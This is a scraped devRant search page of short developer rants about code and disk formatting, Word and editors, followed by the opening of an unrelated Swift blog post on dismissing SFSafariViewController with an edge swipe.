Documenting. Starting Microsoft Word to fill in a preconfigured template. It contains two numbered lists, but the numbering incorrectly continues from the first list to the second. Right-click > Numbering > Set Numbering Value > Start New List. Bang! MS Word fucks up the complete formatting, margins, tabs, paragraph spacing...
But the list numbering still continues from the first list to the second. I SO FUCKING HATE MICROSOFT WORD FOR WINDOWS!!!7 - - - RANT*1000000 Fuck you, Microsoft. It's in the smallest details, like Office, that you just CAN'T install properly on Linux. I tried Wine, Winetricks, PlayOnLinux, went through like 10 different tutorials when I got stuck... Even when I got Office 2013 relatively working (and then couldn't uninstall it later), the formatting got fucked all over the place. And none of the open source replacements do the proper formatting. Even OnlyOffice, that doesn't even have RTL (still!), gets it wrong. And I know, dear Microshit, that you transferred to OOXML and many other word editors support it as well, but it still doesn't work like it should and you STILL refuse to release an Office bundle for Linux. In a world where I'm surrounded by MS users, I can't even view a word document properly, let alone edit it in a normal way. If there's a way Microsoft can keep their clutch on the PC users, it's these small things, and for that - FUCK YOU MICROSOFT.42 - Once had a teammate who added // @formatter:off (eclipse) at the beginning of nearly each class, to make sure my auto-format on save does not ruin his nice formatting as i usually let eclipse take care of this, i commited unformatted code by mistake so he formatted my code by hand1 -?19 -2 - Fought with the Windows Disk Manager for way too long this morning trying to shrink a partition with plenty of space so that I could setup a native dual boot... Screw that tool, I resized the partition to nothing by formatting it - Already using PhpStorm for 2 years now. Just discovered there was an auto-formatting tool for your code. Could have saved me hours of work. Why is life so hard with me2 -?10 - Because, definitely, size shouldn't matter. Code description for the blind: if the size of this query is loved, then close the database and die.8 - Fuck MySQL Workbench! I have spent 2 fucking days diagramming a 350 table database 3 times over because if it doesn't crash and ignore your saves it corrupts its own data and drops the hours of formatting you've done! Now I'm trying to print an ugly un-formatted piece of sh*t because I need to get on a flight to the meeting I need to present this at and it ignores all my default printer settings and wastes 40 A3 sheets of paper. Does Oracle even use the shit they are releasing? For the love of god if you can't maintain it for free fix your fucking bugs and I will buy a license but I cant keep working like this.6 - Fuck this I need to ventilate. Thinking about job change because maintaining and extending 3 years old codebase (flask project) is FUCKIN exhausting. It was badly written since start by someone who obviously didn't know much about python. (Going by commit history.) Examples: - if var != None / if var == None - if var is not None / if var is None (well..) 
- Returning self-parsed obscure JSONs from dict variable - Serializing dictionaries into database by str() (both sqlalchemy and mysql support JSON format) - THEY ARE ALMOST UNUSABLE OTHER WAY AROUND (luckily, python can deal even with that) - celery tasks, the way they are called they BLOCK the whole flask (not bad in itself, but if connection breaks there are no errors, nothing it just hangs) - obscure generator/yielding that contains return of flask's response in itself - creating fifteen thousands of variables one by one where they would look so nicely as dict keys, and hey they are then both MANUALLY SERIALIZED into returning dict by "%s" (string formatting) [okey, some of them are objecst like datetime but MATE WTF] - many, many more, PEP lint shall not pass I would rather deal with fresh startup owners wanting me to program unicorns in one week then trying to extend and manage zombie-like projects. Nothing personal against the firm I actually like the place?! - - Is there some way to format code on devrant or say, surround a section of text with (at minimum) italics? I mean we *are* on a site dedicated to developers.28 - Did you know that Alt+f4 and Ctrl+w does not format your code in VS code? Yes? Our college didn't and we had a good laugh 😂 After that we tried Alt+space+c but he did not trust us anymore.2 - Never enable Prettier and Beautify at the same time. I wasted many hours on this a few days ago wondering why my formatting is getting fucked every time I save.4 - - - Feature request: Being able to copy text from rants/comments on mobile. Also some sort of code formatting would be nice!2 - - - Why is there always one asshole! New job just a month in, had a meeting where we could bring up improvements and put them on cards. I brought up the idea of using slack so we could collaborate better or maybe a collab space. We all have our own offices or share with high walls. The guy running the meeting has the same title as me said we never had that before, are you unhappy with yiur onboarding? Slack or a messaging app is industry standard for even none tech companies. I was polite and said it was just a suggestion and it might make it easier to get help for the new people if there is a group chat. Also brought up using a formatting standard so code reviews are spent commenting on spacing. I said we could you prettier to implement that and just pick a standard. He said that was an issue because people were not paying attention before they pushed the code. I am sorry I am new so I am rewriting and rewriting code all the time. I was to format on save and not spend time fucking formatting! I could use a package before since it I formatted it would look like a bunch of fucking changes in git. Why make things harder? Part of the meeting was how to get code done and PR’ed faster so it gets to the testers. Autoformatting shit would help - - - LaTeX is all fun and cool and awesome until you encounter a stupid formatting issue that is impossible to fucking fix in a sensible amount of time.1 - - dev: ugh we need to set and implement coding standards same dev: no I don't need to follow what you just said, it's already clean and readable (it's - - - When I only want to code, but university LaTeX bullshit burns my time 😭 they dont even have clear rules. Not to mention that their formatting rules make my work look like shit I would never read myself.5 - - This should put an end to those code formatting rants. Now everyone can be on the same page. 
- Automatically clean up code, removing redundant and duplicate bits, splitting large functions, and formatting it nicely. Especially useful when trying to understand some garbage code someone else wrote which you need to rewrite.2 - - #include <stdio.h> int main() { printf("Come at me. I give opening curly brackets their own line, use Dvorak and use tabs!") }5 - - Just merged the stuff that the other intern and I have been working on for the past couple weeks together. He didn't comment a single function; not the couple thousand lines of c# functions on the server side, nor the hundreds of lines of JavaScript on the client side. It's a mess of formatting... Ugh.4 - I see several post about linux, that made me remember the worst day of learning about linux installation many years ago. I actually just want to know about linux, then suddenly install it without any knowledge about formatting harddisk and something like that. And the first choice which come up is "install on entire harddisk" i think its like on windows installer and i go through next and next. Then i got my whole data erased after that. At that time i feel regret.wanna burn my linux cd installer. But the thirst for trying new is so high.its like wanna pay for the mistake. After that i like to install many linux distro to choose which one suit my need. I love linux!!3 - Not really a developer thing but... I was bored so I took apart a 360 hard drive to prove to a friend it's not much different from a computer one Just special adapter and formatting1 - A few weeks ago I ordered 2 8TB HDDs so they can run in RAID 1 on my server. Then I discovered that one of them isn't working. So I sent it back to seagate and got a new fresh one today. I thought I would install it in my server and everything will be fine ... First thing was to backup all files on the already working HDD and delete the volume, but windows already put a pagefile on it so I needed to deactivate it. Restarted and notice that windows wasn't doing anything so I deactivated it again and now the wonderful text "Getting Windows ready screen" appeared and after minutes of starring at a non moving image I force-restarted the server and eventually I could delete the volume. I activated mirroring and thought "I'm ready to go". After 15 Minutes of waiting, the text changed from "Formatting" to "Formatting (1%)". The only thing I wanted to do was yelling ... Thanks Windows .... thanks4 - : - Today's achievement, refactoring forms for a better future, Previously, a form "component", consisted of 700+ lines of unreadable mumble jumble 👉🏻👌🏻🐂💩and no room for improvement, it stores values one by one in the reducer, everytime a field changed, a reducer action is triggered, invoking a specific action for 1 specific field, and storing/formatting its values, And they want to it to be able to support dynamic multiple form fields, Suffice to say, I got the short end of the straw (as usual), and refactoring it using a new library was easier than I thought, overall 250+ lines, over 2 files, with all the required functionality, I'm curious of the guys who made it in the first place, -. - - Used to Google all my `man` pages... Don't really know why. Formatting maybe. Then I typed `man date`... I use `man` for my `man` pages now.3 - - - This is the story of probably the least secure CMS ever, at least for the size of it's consumer base. 
I ran into this many years ago, before I knew anything about how websites work, and the CMS doesn't exist anymore, so I can't really investigate why everything behaved so strangely, but it was strange. This CMS was a kind of blog platform, except only specially authorised users could view it. It also included hosting. I was helping my friend set it up, and it basically involved sending everybody who was authorized a email with a link to create an account. The first thing my friend got complaints about was the strange password system. The website had two password boxes, with a limit of (I think) 5 characters each. So when creating a account we recomended people simply insert the first 5 characters in the first box, and the rest in the second. I can not really think of a good explanation for this system, except maybe a shitty way to make sure password are at least 5 characters? Anyway, since this website was insecure the password was emailed to you after the account was created. This is not yet the WTF part. The CMS forced sidebar with navigation, it also showed the currently logged in users. Except for being unreadable due to a colorful background image, there where many strange behaviors. The sidebar would generally stay even when navigating to external websites. Some internal links would open a second identical sidebar right next to the third. Now, I think that the issue was the main content was in an iframe with the sidebar outside it, but I didn't know about iframe's back then. So far, we had mostly tested on my friends computer, which was logged in as the blog administrator. At some point, we tried testing with a different account. However, the behavior of sidebars was even stranger now. Now internal links that had previously opened a second, identical sidebar opened a sidebar slightly different from the first: One where the administrator was logged in. We expirimented somewhat, and found that by clicking links in the second sidebar, we could, with only the login of a random user, change and edit all the settings of the site. Further investigation revealed these urls had a ending like ?user=administrator2J8KZV98YT where administrator was the my friends username. We weren't sure of the exact meaning of the random digits at the end, maybe a hash of the password? Despite my advice, my friend decided to keep using this CMS. There was also a proper way to do internal links instead of copying the address bar, and he put a warning up not to copy links to on the homepage. Only when the CMS shut down did he finally switch to a system where formatting a link wrong could give anybody admin access. - Do you think my credit card company has a big bounty? String formatting really isn't that difficult.1 - Things that piss me the fuck off about user programs(in this case text editors): No fucking documentation or signs of it available, a promise from like 3 years ago to post: tutorials/actual docs and yet unfulfilled shit. Yet the author sells the editor, you can get a free version of it, but the extension api is only given in the paid version. It's like $12 bucks, which depending on where you are from is really the cost of a meal. The editor in question is 4coder, seems like a good stack for building C/C++ based applications with a lot of cool utilities underneath, I see dudes using it to create a lot of cool shit online, but things like moving input, stopping the thing from formatting pasted code etc etc. 
Shit, even reaching the documentation is fucky, you get the names of the commands......ok...awesome...wtf do I do with these? Why do i need to watch a 20+ minute tutorial from the developer instead of being able to read a retarded ass tutorial regarding how to do the most basic shit? For an editor that is set to replace Emacs and Vim for developers inside of a windows platform....it sure is lacking AF in that regards. I really want to work with this thing because it seems to be made with a lot of heart, just can't stand the fact that the documentation is lacking like a motherfucker4 - So one thing that kinda bugs me about php embedding is the white space formatting it creates when you break your project into templates or includes. It has no affect on the front end at all but if you look at the source code, usually the top tag in a php template is spaced way off, unless you move your entire php code block all the way to the left. Then somehow it looks right on the frontend but now your php source code looks messy xD Could just be my code editor (ST3) but idk. Anybody else?2 - So I'm having a discussion with frontend devs now and I'm curious how you folks are doing this: suppose you have a rest api at BE and some js framework in FE consuming it. Where do you format display info at: BE or FE? Info like human-readable timestamps [according to user's TZ], i18n, displaynames with appropr. lengths, etc.. Is this a job for FE or BE in your oppinions? [imo it's view's job to be responsible for view-speciffic matters, while BE should provide all required info for FE to do it's formatting et al.]20 - When I code in Qt Creator, and a function get to be more than 950 lines of code, autocomplete/autoformatting stops working. I feel like Qt Creator is judging me...6 - - - Moment.js, because without it, formatting and converting JS Date objects to other timezones is a bitch - - In code reviews they are whining about formatting with spaces and newlines and naming. The fact that they are too bored to write unit tests and code coverage cannot reach 20%? Isn't it just sad?6 - - I spent the week working on an adapter to a specific format, the client came this morning to tell us Json would also have worked. Then why didn't you tell me earlier?!? - You want me to plot this formatting monstrosity in Excell... nope... I need python to fix the data sets anyway.6 - Wasted an hour figuring out why the backed up files and pics from an OTG device cant be seen on my laptop (linux) Fucking OTG file system formatting is exFat. (i know i should get exfat-utils) - Any browser (+plugin) recommendations for viewing JSON and XML? Ideally for Mac OS, but have a Windows 7 VM I can use instead if there's a much better option. Currently I'm copying from Safari and pasting into Notepad++ and formatting with a plugin, but that feels pretty sub-optimal. Suggestions much appreciated.3 - Saw this in the Python project codebase today: arg = '\"foo\"' Which is funny, because '\"foo\"' == '"foo"' - - - So after 10 BSODs and 5 hours of recorvering, formatting and reinstalling we finally managed to reinstall Windows 10 on my friends computer! Yaaaaah! I was so freaking stressed and frustrated but now its all good2 - - Java developers not correctly formatting their code. Like, guys, seriously...your IDEs do that for you and it saves me from having to look at checkstyle complaining for a million lines....1 - Poll time/input requested. Multiple assignments in one statement: yay or nay? For a (painfully) simple example: a = b = true; vs. 
a = true; b = true;7 - - My boss writes code like this: def someFunction (someArg: String) = ... Who does that?! A space? Da fuck?! And it's all over the code base. Whenever another dev touches any of his stuff, we correct it: def someFunction(someArg: String) = ... The way god intended it!8 - I run auto-formatter with every typo correction so nobody notices. 300 lines changed, message "formatting" - I still don't get it why we don't have code snippet paste ability, like slack or .MD file? Can we have some little formatting please? Pasting screenshots is not always the best.3 -. - Arg, Visual Studio 2015, stop trying to fix my comment indentation! It's a comment and. It is NOT part of the code. Leave my formatting alone!!!3 - ?4 - That feeling when you type out a hilarious response to someone's rant on DevRant, written with meticulous code styling, and then you realise formatting is ignored! -. - Why do I always default to formatting/resetting whenever I have a tech problem... Android bootloop: reset device, lose all datas and reroot. Root cause turned out to be need to uninstall Magisk first. Today: Can't connect Chromecast even after restarting phone and Chromecast. Reset Chromecast completely, configured again fine but then can't connect again. Root cause: router, router just needed to be restarted...2 - If every computer of a relative has been at least once brought to you for formatting and windows setting up, then you're an engineer.1 - I know, it is unprofessional. I know, it is lacking comments and proper formatting. [...] I was going through two old codebases of mine. Here are two code snippets of them. I find the frustruated comments amusing. I guess that counts as self-sadistic behavior lol1 - They are using a interesting code formatting style Star Citizen: Bugsmashers! - Spectator Mode Crash - YouTube - - Use git branch --merged to get, you guessed it, all the branches you have merged. Use git branch -d <branch-name> To delete a branch if it has been merged (use -D for forced) And Use, git branch --merged | egrep - v "(^\*|master|dev)" | xargs git branch - d To delete all the branches that you have merged (but not anything with master/dev in their names) Sorry for the formatting, I don't know how coder formatting works on DR.. - The worst part about programming assignments at my school is formatting the god damn output strings. Fuck2 - Am I the only one who thinks to rewrite whole thing when the code have weird formatting and so complex to understand and annoying bunch of functions which can be just ternary or an if? - So, im getting tired of the clutter on my home computer. Thinking about formatting my SSD and putting a fresh OS install, however, I was having trouble deciding between re-doing Windows 10 or going to linux OS. Thing is, I play vidya games on this computer too, but I want it to mainly be a workstation. What do?6 - !rant Can we bring into discussion inline monospaced code snippets again? Basic markdown text formatting. Like bold, italics, lists. - I wish I could start my web based Brainfuck IDE with single stepping and breakpoints, as well as code formatting. I wrote it as a Java desktop application 2 years ago with no comments and I've never touched it since. - Fuck python Excel libraries. Had to write a spreadsheet formatting/filtering script to automate content generation. Definition of too much work. On the plus side just auto formatted 5000 spreadsheets in seconds.3 - Guess who’s back after a few months. 
I was so frustrated because of something at work today that I needed to vent. So currently we are working together with a frontend company, we make the api, they do the frontend. I got a few feedback points, one of the things was that they asked if the dates could be formatted in our language. I said no that’s not really recommend because the api should only handle data not translations or date formatting. They responded with that it was because of speed... Date formatting is literally a few fucking milliseconds. Technically it is even slower serverside because the fact that I need to process it in a serverless function which is probably less powerful than the average client machine. Fucking lazy fucks.11 - Teammate used some excel sheet concoction/gimmick to execute hundreds of thousands insert statements on production tables. A few days later (when I'm on call), I find out he didn't adjust the cell formatting on the aforementioned excel "tool", so all the network addresses from the insert statements were put in scientific notation, on prod...thus breaking a lot of the things. FML - - - Every time I decide to reset my working environment I get last minute requests flagged with the highest importance. I swear it's a God damn conspiracy. - - I'm dying when I see a span of code out there in the wild, mixed with everything else. `Can we have some backtick love?` This is a site for developers. Halp! - The moment you pull the latest changes just to find out that your new coworker edited all the js files in xcode1 - How come when posting a rant I can keep coherent paragraphs like so: line 1 line 2 line 3 ...but when I post a comment the same text looks like this: line 1 line 2 line 3 WTF devRant? Be consequent with your formatting.6 - What is everyone's preferred formatting for functions/if statements. Does the first curly brace go on the same line or a new line? function 1() { } or function 2() { - - working on a second PC, (formatting it) and it's not connected to the internet, it's clock is an hour in advance for w/e reason, have been using it's screensaver-clock all day 7pm, time to go home, .. fuck only 6pm, noooooooooo - - I had this teacher who was teaching us how to use java and .NET to parse XML data to an excel sheet. Let's say every week i was spending at least 2 hours finding bugs in the excel formatting and telling it to the teacher. This happened for few weeks and when the project ended I could see how tired of he was. To this day me and my colleague still rant about that - I - Is there a way to stop all these code formatting arguments ince for all? For example, a github /ide plugin reformats your code to your preference when you work on/review but in the end, it is stored in some specific format.7 - I simplified 7 functions down to a blob because it was truly unreadable and fragmented. As I did it, I thought there was no way I did it right. This can't be the logic. Nope. It is. Yeah, the formatting could be better. End of the shift so that's a tomorrow thing.10 -?6 - - Formatting code on stack overflow is a fuckin pain. One thing is off and the website is like WAIT WAIT WAIT WAIT. 
And then after all that time spending formatting it, to get your question closed for not being specific enough.2 - - I've always was curious why people debating about mostly two code formatting types for(;;) { //somestuff } or for(;;){ //somestuff } while almost no one uses pretty decent IMO type like for(;;){ //somestuff //somemorestuff} (with tabs ofc) It might be easier to forget some }s, but other than that it seems pretty nice to me13 - - - Me: 'here we go, code working completely as intended, tested and without bugs.' Senior after reviewing code: 'apart from the formatting errors, I'd also do this piece of coding in a different manners' Me: 'well this seems more like a change the whole logic request rather than a small improvement, I'll keep it like this and resolve it like suggested on a future opportunity' Still in prod. - - So, I just attempted to use KDE's partitionmanager application on Gentoo... just noticed that every time I run it, it screws up the formatting in /etc/fstab. That's a deal-breaker! Back to gparted... - Was generating a JSON based config manually to be used by a script another dev wrote - only to be criticized for using the text editors built in formatter. Evidently lining up the colon separating key value pairs is a thing. If readability was so important to you why the fuck did you decide on using JSON as a configuration format? Especially when you could have gone with YAML or better yet INI (flat key/value pairs) style config. - - I was once formatting a pendrive and Windows decided to shutdown and killed the pendrive... It ain't mine you know?1 - so we want to use this software for document mangement (versioning and stuff). i totally understand why the developer used rtf for document templates. but it took me freaking 6 hours to create a simple document header while finding out 500 designs and methods that didn't work due to the rtf format corset that differs more from word formatting abilities that i expected. - Found an interesting talk about formatting code, any thoughts of the points he brings up, yay or nay?
https://devrant.com/search?term=formatting
CC-MAIN-2020-24
en
refinedweb
MicroPython WS2801

A MicroPython library to interface with strands of WS2801 RGB LEDs. It's based on the Adafruit WS2801 library for regular Python.

Examples

Copy the file to your device using ampy, webrepl, or by compiling and deploying, e.g.:

$ ampy put ws2801.py

Use a 7-pixel strand and set all LEDs red:

from machine import SPI
from ws2801 import WS2801Pixels

spi = SPI(1)
ws = WS2801Pixels(7, spi)
ws.set_pixels_rgb(255, 0, 0)
ws.show()

License

Licensed under the MIT License.
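For per-pixel control, something like the following chase animation should work — with the caveat that set_pixel_rgb(), clear() and count() are assumed here to match the Adafruit WS2801 API this library is based on (only set_pixels_rgb() appears above):

import time
from machine import SPI
from ws2801 import WS2801Pixels

spi = SPI(1)
ws = WS2801Pixels(7, spi)

# Walk a single green pixel down the strand.
while True:
    for i in range(ws.count()):          # count() assumed from the Adafruit API
        ws.clear()                       # all pixels off (buffered)
        ws.set_pixel_rgb(i, 0, 255, 0)   # one green pixel
        ws.show()                        # push the buffer out over SPI
        time.sleep_ms(100)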
https://libraries.io/pypi/micropython-ws2801
CC-MAIN-2020-24
en
refinedweb
A week of symfony #430 (23-29 March 2015) This week, Symfony officially introduced its new installer. In addition, the String security utils were refactored and some nice performance improvements were applied to DomCrawler component and to the PHP container dumper. Lastly, the upcoming Symfony 3 version removed all the *.class container parameters, since they are no longer considered a good practice. Symfony2 development highlights - fa9fb5c: [DomCrawler] replace GET parameters when changed via form parameters - 2cc5011: [DependencyInjection] improve PhpDumper performance for huge containers reusing visited lookup with reference - f24c8ab: [SecurityBundle] removed a duplicated service definition and simplified others - ec4e9d2: [Security] refactored String utils - bdea4ba: [Security] prevent modifying secrets as much as possible - 45cfb44: [Security] changed behavior to mirror hash_equals() returning early if there is a length mismatch - e29f74e: [travis] kill tests when a new commit has been pushed - ccd32d5: Translator component has default domain for null implemented - bd7788a: [DomCrawler] improved namespace discovery performance - 99330cb: [DependencyInjection] prevented inlining service configurators - eda1ab7: [WebProfiler] fixed partial search on URL in list - 39da732: [FrameworkBundle] added support for dynamic configurations in debug:config - ea8da6e: [Security] fixed confused StringUtils::equals() arguments in RememberMe Cookie based implementation - e8b0678: [TwigBridge] improved Bootstrap layout whitespace control - 9944589: [VarDumper] fixed dumping ThrowingCasterException - 89a6b95: [Security] improved entropy of generated salt - 89cbafd: [DependencyInjection] improved YAML syntax support for keys "method" and "arguments" in "calls" statement - 7e94662: [FrameworkBundle] allowed to disable Kernel reboot - e99c09e: [Translation] refresh cache when resources is changed in debug mode - 83c6d22: [VarDumper] added Caster for XML-parser resources - 2462c5b: [VarDumper] with-er interface for Cloner\Data - f5a020e: [Validator] removed the API version in the validator component - 504e338: [DependencyInjection] made it possible to dump inlined services to XML - 1008e6c: [VarDumper] add caster for MongoCursor objects - 51223d2: [WebProfilerBundle] fixed collapsed profiler menu icons - 12c1feb, 70f1f24: [VarDumper] implemented expand all on ALT+click - a5628bd: [FrameworkBundle] display friendly message if the event does not have any registered listeners - ed18767: [Console] added support for table colspan/rowspan + multiple header lines - 9d6596c: [Translation] allowed extracting an array of files besides extracting a directory - d3b8b84: [Form] improved triggering of the setDefaultOptions deprecation error - 8835d1a: removed all *.class parameters Newest issues and pull requests - Towards PHP 7 compatibility - [DX] Provide an easy way to check if a user has a security role - [DX] [Form] Ability to reset form validation errors (or prevent them from rendering) - [Form] filter entity choicelist after hydration - Should the ParameterBag get method be changed? 
- Symfony2 web profiler return 404 error, js code duplicate in footer - [DomCrawler] phpFiles array is generated wrongly for fields with more than one level - Missing access decision strategy highest not abstained voter - [DX] src/AppBundle versus app Twig development highlights - 8bb7cbb: [1.x] fixed memory leaks in PHP extension - c41d305: [1.x] cleanup API and code of the PHP extension Silex development highlights SwiftMailer development highlights They talked about us - The benefits of decoupling your CMS - New Symfony installer: the fastest way to start your Symfony project - Choosing your framework − Laravel & Symfony - Best PHP Framework for 2015 – SitePoint Survey Results - Introduction to Symfony2: Getting Ready for D8 - Uploading Files using AngularJS and symfony2 - Symfony Components in Legacy Code - Novo Symfony Installer disponível - Symfony Live 2015 : Construire des applications API-centric avec Symfony - Apresentando o novo Instalador do Symfony - Symfony2 - Supprimer le Bundle de démo Acme - Neuer Symfony Installer ersetzt traditionelle Composer-Installation - El nuevo instalador de Symfony - Agregar última fecha de modificación automaticamente en el CRUD de Symfony2 - Symfony2.x to 3.0升级日志 - Symfony Meetup #2を開催しました @Felipe thanks for the reference. However, we seldom link to video contents. We prefer written articles, news, blog posts, tutorials, etc. Why is *.class% considered bad practice? Seemed like an easy way to override default behaviour if you needed it.
https://symfony.com/blog/a-week-of-symfony-430-23-29-march-2015
CC-MAIN-2020-24
en
refinedweb
github.com/openzipkin-contrib/zipkin-go-opentracing zipkin-go-opentracing OpenTracing bridge for the native Zipkin tracing implementation Zipkin Go.

Notes

This package is a simple bridge that allows OpenTracing API consumers to use Zipkin as their tracing backend. For details on how to work with spans and traces we suggest looking at the documentation and README of the OpenTracing API. For developers interested in adding Zipkin tracing to their Go services we suggest looking at Go kit, which is an excellent toolkit to instrument your distributed system with Zipkin and much more, with clean separation of domains like transport, middleware / instrumentation and business logic.

Examples

Please check the zipkin-go package for information on how to set up the Zipkin Go native tracer. Once set up, you can simply call the Wrap function to create the OpenTracing-compatible bridge.

import (
	"log"

	"github.com/opentracing/opentracing-go"
	"github.com/openzipkin/zipkin-go"
	zipkinhttp "github.com/openzipkin/zipkin-go/reporter/http"
	zipkinot "github.com/openzipkin-contrib/zipkin-go-opentracing"
)

func main() {
	// bootstrap your app...

	// zipkin / opentracing specific stuff
	{
		// set up a span reporter (the collector endpoint URL was elided in the original)
		reporter := zipkinhttp.NewReporter("")
		defer reporter.Close()

		// create our local service endpoint
		endpoint, err := zipkin.NewEndpoint("myService", "myservice.mydomain.com:80")
		if err != nil {
			log.Fatalf("unable to create local endpoint: %+v\n", err)
		}

		// initialize our tracer
		nativeTracer, err := zipkin.NewTracer(reporter, zipkin.WithLocalEndpoint(endpoint))
		if err != nil {
			log.Fatalf("unable to create tracer: %+v\n", err)
		}

		// use zipkin-go-opentracing to wrap our tracer
		tracer := zipkinot.Wrap(nativeTracer)

		// optionally set as Global OpenTracing tracer instance
		opentracing.SetGlobalTracer(tracer)
	}

	// do other bootstrapping stuff...
}

For more information on zipkin-go-opentracing, please see the documentation at go doc.
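Once the global tracer is set as above, any OpenTracing-instrumented code can create spans without referencing Zipkin directly. A minimal sketch (the operation and tag names here are made up):

// somewhere in request-handling code, after opentracing.SetGlobalTracer(tracer)
span := opentracing.StartSpan("compute-order-total") // uses the global tracer
defer span.Finish()
span.SetTag("component", "billing")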
https://search.gocenter.io/github.com/openzipkin-contrib/zipkin-go-opentracing
CC-MAIN-2020-24
en
refinedweb
Mystery of StaleElementReferenceException in Selenium WebDriver

If you are a Selenium developer then you have surely faced this mysterious exception called "StaleElementReferenceException". Why exactly does it occur? This has been one of my favorite interview questions for many years, and most of the time candidates confuse it with NoSuchElementException. If you have never worked on a dynamic AJAX-based application, there is a chance you have never faced it. Let's go a little deeper and unveil the mystery behind it. When we run a simple piece of code like this:

WebElement searchBox = driver.findElement(By.cssSelector("input[name='q']"));
searchBox.sendKeys("Selenium");

When WebDriver executes the above code, it assigns an internal id (refer to the image below) to every web element, and it uses this id to interact with that element.

Now, let's assume that after you have fetched the element, but before doing any action on it, something got refreshed on your page. It could be an entire page refresh or some internal AJAX call which has refreshed a section of the DOM where your element falls. In this scenario the internal id which WebDriver was using has become stale, so now for every operation on this WebElement, we will get StaleElementReferenceException. To overcome this problem, the only choice we have is to re-fetch the element from the DOM, and this time WebDriver will assign a different id to it. So what we understand from the above example is that if we are working with an AJAX-heavy application where the page's DOM can change on every interaction, it is wise to fetch web elements every time we operate on them. There are a couple of ways to make sure the element always gets refreshed before we use it:

Page Factory Design Pattern: Please refer to the code below.

GoogleSearchPage page = PageFactory.initElements(driver, GoogleSearchPage.class);

public class GoogleSearchPage {
    @FindBy(how = How.NAME, using = "q")
    private WebElement searchBox;

    public void searchFor(String text) {
        searchBox.sendKeys(text);
    }
}

In the above example, a proxy is configured for every WebElement when the page is initialized. Every time we use a WebElement it will be found again, so we shouldn't see a StaleElementException. This approach solves the stale element problem in most places, except some corner cases which I will cover in the next approach.

Refreshing the element whenever it gets stale: When you work on a modern, reactive, real-time application developed in technologies like AngularJS/ReactJS, there is a lot of data and a persistent web-socket connection that keeps pushing data to your browser, which keeps changing your DOM. Let's take the example of a stock exchange where a data grid displays real-time information and the data changes very frequently. In this case, whenever the data changes server-side, the changes are pushed automatically to your UI grid, and depending on the data, the respective rows or cells will get stale. Here, Page Factory cannot help, as most of your grid elements are dynamic and you cannot configure their locators while initializing your page. Also, if you have created your own data model to parse the data, it is difficult to configure Page Factory across all your data model classes. To deal with this problem I decided to develop a generic method to refresh the element in case it gets stale.
To refresh an element, we first need to figure out its By locator, but the Selenium API has not exposed anything to re-construct the locator from an existing web element. I was fortunate that they have exposed a toString method on WebElement which prints all the locators being used to build that element. Let's see the below example where we find an element which is a child of another element:

WebElement elem1 = driver.findElement(By.xpath("//div[@id='searchform']"));
WebElement elem2 = elem1.findElement(By.cssSelector("input[name='q']"));
System.out.println(elem2.toString());

Output of the above code would be:

[[[[ChromeDriver: chrome on XP (bd6a0d83229c67d5f7e6060b1bd768e9)] -> xpath: //div[@id='searchform']]] -> css selector: input[name='q']

Now we have to apply all the reverse-engineering to build the element again from this string. Thanks to the Reflection API in Java, which can help us to dynamically execute the code to build the element. Here is the final implementation:

WebElement refreshedElement = StaleElementUtils.refreshElement(elem2);

This refreshElement method will check if the element is stale, and if so it will re-fetch the element from the DOM (a sketch of what such a helper could look like appears after the comments below). So for all the data grid elements which can get stale at any time, we can use this method as a precautionary measure to avoid stale element exceptions. Please feel free to share your thoughts on my approach; I would love to know how you have handled this interesting exception.

import com.sahajamit.selenium.driver.DriverManager; what is this sir? Can you please share your DriverManager class which you have imported here..

+1

hi, mind sharing com.sahajamit.selenium.driver.DriverManager with us?

Hi Naveen, your explanation is really great, just wanted to check, can you explain on StaleElementUtils class and the methods,
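The post doesn't include the StaleElementUtils source, so for the readers asking above, here is a rough sketch of the idea — illustrative only: it re-finds each step of the toString() locator chain with plain string parsing (rather than the reflection the author mentions), and, unlike the one-argument call shown in the post, it takes the WebDriver explicitly:

import org.openqa.selenium.*;

public class StaleElementUtils {

    public static WebElement refreshElement(WebDriver driver, WebElement elem) {
        try {
            elem.isEnabled(); // any call on a stale element throws
            return elem;
        } catch (StaleElementReferenceException e) {
            // toString() looks like:
            // [[driver...] -> xpath: //div[@id='searchform']] -> css selector: input[name='q']
            String[] parts = elem.toString().split(" -> ");
            SearchContext context = driver;
            WebElement refreshed = null;
            for (int i = 1; i < parts.length; i++) {
                // Naive cleanup: strip the trailing ']' characters added by nesting.
                // This breaks locators that legitimately end with ']', so a real
                // implementation needs proper bracket balancing.
                String locator = parts[i].replaceAll("\\]+$", "");
                int colon = locator.indexOf(':');
                String how = locator.substring(0, colon).trim();
                String using = locator.substring(colon + 1).trim();
                refreshed = context.findElement(toBy(how, using));
                context = refreshed; // next locator is resolved relative to this element
            }
            return refreshed;
        }
    }

    private static By toBy(String how, String using) {
        switch (how) {
            case "xpath":        return By.xpath(using);
            case "css selector": return By.cssSelector(using);
            case "id":           return By.id(using);
            case "name":         return By.name(using);
            default: throw new IllegalArgumentException("Unhandled locator: " + how);
        }
    }
}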
http://naveenautomationlabs.com/mystery-of-staleelementreferenceexception-in-selenium-webdriver/
CC-MAIN-2020-24
en
refinedweb
In iOS 9 Apple introduced SFSafariViewController. In a nutshell, it pretty much runs full Safari in your app. This is great, as the user gets all Keychain passwords, Safari extension access, cookies, session data, etc. All of that is done securely, as SFSafariViewController spins up a separate process, so the app does not have access to SFSafariViewController's content (more info here). That's all great, however there is a problem. The result of pushing SFSafariViewController onto a UINavigationController is the loss of the default bar behaviour, which looks pretty bad. So really, the only option is to present it modally. This has its own drawbacks. Apple has made the unfortunate choice of placing the Done button in the top right corner. This makes it very difficult to dismiss when using the phone one-handed. Although, I don't really think positioning it anywhere else would solve the problem. The standard swipe-from-the-edge-of-the-screen gesture really is the way to go. My solution to this problem is to trade swiping from the edge to go back in browsing history for dismissing the view controller. I create a subclass of SFSafariViewController and add a 5-points-wide UIView to it. The view covers its entire height. The background colour of the view is imperceptibly transparent white. The right thing to do would be to override hitTest: and have it entirely transparent, but this is a quick and dirty hack :-). This view is in the app's process and therefore accessible to us.

import UIKit
import SafariServices

class SCSafariViewController: SFSafariViewController {

    var edgeView: UIView? {
        get {
            if (_edgeView == nil && isViewLoaded()) {
                _edgeView = UIView()
                _edgeView?.translatesAutoresizingMaskIntoConstraints = false
                view.addSubview(_edgeView!)
                _edgeView?.backgroundColor = UIColor(white: 1.0, alpha: 0.005)
                let bindings = ["edgeView": _edgeView!]
                let options = NSLayoutFormatOptions(rawValue: 0)
                let hConstraints = NSLayoutConstraint.constraintsWithVisualFormat("|-0-[edgeView(5)]", options: options, metrics: nil, views: bindings)
